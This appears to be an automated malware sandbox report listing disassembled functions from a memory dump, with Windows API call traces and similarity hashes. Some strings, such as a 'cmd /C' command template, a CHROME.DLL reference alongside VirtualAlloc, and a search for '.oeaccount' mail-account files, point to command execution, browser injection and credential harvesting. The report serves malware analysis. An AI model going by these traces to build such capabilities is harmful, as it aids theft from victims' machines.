  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
